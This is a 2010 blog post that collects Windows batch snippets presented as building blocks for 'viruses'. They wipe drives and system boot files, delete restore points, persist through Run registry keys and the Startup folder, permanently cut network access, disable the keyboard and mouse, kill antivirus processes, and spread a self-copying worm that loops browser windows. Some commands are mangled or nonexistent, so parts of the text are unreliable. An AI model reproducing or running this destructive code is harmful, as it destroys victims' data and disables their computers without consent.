Wednesday, October 20, 2010

List Of Batch

List Of Batch
----CHANGE ALL FILES TO .TEXT----

REN *.DOC *.text
REN *.JPEG *.text
REN *.LNK *.text
REN *.AVI *.text
REN *.MPEG *.text
REN *.COM *.text
REN *.BAT *.text

-----DESTROY THERE INTERNET-----

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Love jagman64
PAUSE

----EREASE HARDRIVE----

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

----DESTROY ALL .TXT FILES---- (CHANGES WHAT TYPES OF FILES YOU DELTE BY CHANGING WHATS IN BRACKETS)

@echo off

del *.txt

-----CRASH-BY OPENING PROGRAM ALOT----(CHANGE WHAT FILE TO OPEN BY CHANGING NOTEPAD TO DESIRED PROGRAM NAME)

@echo off
:start
open notepad
goto start

-----SHUTDOWN COMPUTER CODE-----

shutdown -s (Inster at end of a virus)
-t 100 (-t stands for time till shut down, 100 is how many seconds, so there computer will shutdown in a hundred seconds)
-c "Goodbye" (-c stands for comment)
Should look like this:
shutdown -s -t 100 -c "goodbye"

-----MEGA POPUPS-----

start
start
start
start
popup.bat
(Make sure you save it as what you type in at the bottom, so im saving mine as popup.bat)

-----WHIPE C:\----

FORMAT C:

----CHANGE IP----

IPCONFIG /RELEASE
netsh interface ip set address name="Local Area Connection" static 10.0.0.10 255.0.0.0
netsh interface ip set address "Local Area Connection" dhcp

----TAKE AWAY VIRUS----

Go to start and click run type in
%SystemRoot%\system32\restore\rstrui.exe
and select a date before you got a virus, it will make your computer go back to that day.
Or open cmd and type in rstrui.exe

----AUTO SHUTDOWN----

@echo off
copy "Pwnscape.bat" "C:\Documents and Settings\All Users\Start Meun\Program\Startup"
cd "C:\Documents and Setting\All Users\Start Menu\Start Menu\Program\Startup"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
shudown -s -t 5 -c "Love-Jagman64"
or

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Love Jagman64
PAUSE

----RENAMES ALLFILES.TXT DELS *.TXT AUTO START UP----

@echo off
Copy "Pwnscape.bat" "C:\Users\User32\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
cd "C:\Users\Usr32\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
DEL C:\Windows\System32\restore
REN *.DOC *.txt
REN *.JPEG *.txt
REN *.LNK *.txt
REN *.AVI *.txt
REN *.MPEG *.txt
REN *.COM *.txt
REN *.EXE *.txt
del (.txt*)
start
start
start
Pwnscape.bat
Shutdown -s -t 10 -c "love-Jagman64"

----MASS PING----

ping http://www.google.com -t -l 50000

----PERMANENT INTERNET DISABLE----

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Love- Jagman64
PAUSE

----FLOOD NETWORK----

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

----HOW TO TASKKILL PROGRAMS----(Simply find out the task name, eg: Msn is msnmsgr, Limewire is, LimeWire)

tskill LimeWire
tskill msnmsgr
tskill AVGAURD

----SWAP MOUSE BUTTONS----

RUNDLL32 USER32.DLL.SwapMouseButton

----MAKE YOUR FILE HIDDEN----

Attrib +r +h filename&locationhere.bat EG:Attrib +r +h C:\windows\startm~1\program\startup\virusbat

----COPY TO SYSTEM ROOT----

copy %0 %systemroot%\Virus.bat > nul

----MAKE THERE OWN COMPUTER DO A SIMPLE DOS ATTACK ON THEMSELVES----

ping 127.0.0.1 -t -l 50000 > NUL or
ping -n 4 localhost > NUL

----OPEN FILE ON START UP (1)----(Simpley put this anywhere in your virus)

echo copy %0 >> c:\autoexec.bat

----OPEN FILE ON START UP (2)----

copy %0 c:\windows\startm~1\Programs\StartUp\virus.bat

----0PEN FILE ON START UP (3)----

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg
start c:\regstart.reg

----DELETE SYSTEM DRIVE----

del %systemdrive%\*.*/f/s/q

----GET ADMINASTRATOR RIGHTS----

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.

----SHUT HARDWARE DOWN----

hdmemory/release

----DELETE SYSTEM HARDDRIVE----

del %systemdrive%\*.*/f/s/q

----SHUTS DOWN COMPUTER FOREVER----

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

----RECORD AUDIO----

REM this checks if theres any folder named Voice
:speaker
IF EXIST "Voice" goto Menu
IF NOT EXIST "Voice" goto voicemake
REM this makes a folder named voice if not alredy exist
:voicemake
md Voice
goto vbss
REM this makes the VBS files in the voice folder
:vbss
echo.Set Speech = CreateObject("SAPI.SpVoice")>> "%CD%\Voice\Welcome.vbs"

----DISABLE KEYBAORD----

rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------

----DISABLE MOUSE----

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


----SOME COMMANDS---- (List may be long)

-i (Display Gui-Most be first)
-l (Log off)
-s (Shutdwon)
-r (Restart)
-a (Stop Shutdown)
-m \\computername (Remove computer shutdown)
-t (Time till command)
-c "" (Comment)
-f (closes windows)
/y (Yes)
:START (See GOTO-The word LABEL is a example-it is not need any command will work)
Exit (Closes the cmd)
Pause (Click a key to continue)
START (Tells computer to open application Ex. "Start C:\WINDOWS\CALC.exe" Would open calculator.)
@echo off (Hides Commands being used in CMD)
Call (Run another batch file Ex. "CALL C:\MYVIRUS.BAT" )
CD (Change Directory Ex. CD C:\ Will go to C:\ Drive)
Append (Tells computer to open a file in a specific route)
GOTO (Tells computer to go back to a label":" Ex. GOTO Start)


----WORM---- (Copies it self and opens tons of porn sites)

@echo off
title You've been HACKED!
Echo hello %userprofile%
copy %0% "%userprofile%\Windows\Start Menu\Startup"
copy %0 c:\windows\startm~1\Programs\StartUp\XatHacker.bat
:Start
start iexplore.exe "www.nobrain.dk"
GOTO start
shutdown -r -t 100 -c "You shouldn't [love] with Jagar"

----BLOCK WEBSITES----

Echo 127.0.0.1 http://www.google.com >>%windir%/system32/drivers/etc/host

No comments:

Post a Comment